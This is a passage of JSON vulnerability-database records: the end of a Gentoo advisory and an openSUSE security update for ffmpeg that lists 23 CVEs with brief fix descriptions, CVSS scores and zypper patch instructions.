"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13312", "CVE-2019-15942", "CVE-2020-12284", "CVE-2020-13904", "CVE-2020-14212"], "modified": "2020-07-28T00:00:00", "id": "GLSA-202007-58", "href": "https://security.gentoo.org/glsa/202007-58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-04-21T22:47:24", "description": "An update that fixes 23 vulnerabilities is now available.\n\nDescription:\n\n This update for ffmpeg fixes the following issues:\n\n - CVE-2020-13904: Fixed use-after-free via a crafted EXTINF duration in an\n m3u8 file (bsc#1172640).\n - CVE-2020-21041: Fixed buffer overflow vulnerability via\n apng_do_inverse_blend in libavcodec/pngenc.c (bsc#1186406).\n - CVE-2019-17539: Fixed NULL pointer dereference in avcodec_open2 in\n libavcodec/utils.c (bsc# 1154065).\n - CVE-2020-22026: Fixed buffer overflow vulnerability in config_input() at\n libavfilter/af_tremolo.c (bsc#1186583).\n - CVE-2020-22021: Fixed buffer overflow vulnerability in filter_edges\n function in libavfilter/vf_yadif.c (bsc#1186586).\n - CVE-2020-22020: Fixed buffer overflow vulnerability in build_diff_map()\n in libavfilter/vf_fieldmatch.c (bsc#1186587).\n - CVE-2020-22015: Fixed buffer overflow vulnerability in\n mov_write_video_tag() due to the out of bounds in libavformat/movenc.c\n (bsc#1186596).\n - CVE-2020-22016: Fixed a heap-based Buffer Overflow vulnerability at\n libavcodec/get_bits.h when writing .mov files (bsc#1186598).\n - CVE-2020-22017: Fixed a heap-based Buffer Overflow vulnerability in\n ff_fill_rectangle() in libavfilter/drawutils.c (bsc#1186600).\n - CVE-2020-22022: Fixed a heap-based Buffer Overflow vulnerability in\n filter_frame at libavfilter/vf_fieldorder.c (bsc#1186603).\n - CVE-2020-22023: Fixed a heap-based Buffer Overflow vulnerability in\n filter_frame at libavfilter/vf_bitplanenoise.c (bsc#1186604)\n - CVE-2020-22025: Fixed a heap-based Buffer Overflow vulnerability in\n gaussian_blur at libavfilter/vf_edgedetect.c (bsc#1186605).\n - CVE-2020-22031: Fixed a heap-based Buffer Overflow vulnerability at\n libavfilter/vf_w3fdif.c in filter16_complex_low() (bsc#1186613).\n - CVE-2020-22032: Fixed a heap-based Buffer Overflow vulnerability at\n libavfilter/vf_edgedetect.c in gaussian_blur() (bsc#1186614).\n - CVE-2020-22034: Fixed a heap-based Buffer Overflow vulnerability at\n libavfilter/vf_floodfill.c (bsc#1186616).\n - CVE-2020-20451: Fixed denial of service issue due to resource management\n errors via fftools/cmdutils.c (bsc#1186658).\n - CVE-2020-20448: Fixed divide by zero issue via libavcodec/ratecontrol.c\n (bsc#1186660).\n - CVE-2020-22038: Fixed denial of service vulnerability due to a memory\n leak in the ff_v4l2_m2m_create_context function in v4l2_m2m.c\n (bsc#1186757).\n - CVE-2020-22039: Fixed denial of service vulnerability due to a memory\n leak in the inavi_add_ientry function (bsc#1186758).\n - CVE-2020-22043: Fixed denial of service vulnerability due to a memory\n leak at the fifo_alloc_common function in libavutil/fifo.c (bsc#1186762).\n - CVE-2020-22044: Fixed denial of service vulnerability due to a memory\n leak in the url_open_dyn_buf_internal function in libavformat/aviobuf.c\n (bsc#1186763).\n - CVE-2020-22033,CVE-2020-22019: Fixed a heap-based Buffer Overflow\n Vulnerability at libavfilter/vf_vmafmotion.c in convolution_y_8bit() and\n in convolution_y_10bit() in libavfilter/vf_vmafmotion.c (bsc#1186615,\n bsc#1186597).\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-2322=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "suse", "title": "Security update for ffmpeg (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17539", "CVE-2020-13904", "CVE-2020-20448", "CVE-2020-20451", "CVE-2020-21041", "CVE-2020-22015", "CVE-2020-22016", "CVE-2020-22017", "CVE-2020-22019", "CVE-2020-22020", "CVE-2020-22021", "CVE-2020-22022", "CVE-2020-22023", "CVE-2020-22025", "CVE-2020-22026", "CVE-2020-22031", "CVE-2020-22032", "CVE-2020-22033", "CVE-2020-22034", "CVE-2020-22038", "CVE-2020-22039", "CVE-2020-22043", "CVE-2020-22044"], "modified": "2021-07-14T00:00:00", "id": "OPENSUSE-SU-2021:2322-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MM55YS6XXAKFK3J35CDODMYMAZO6JX3S/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}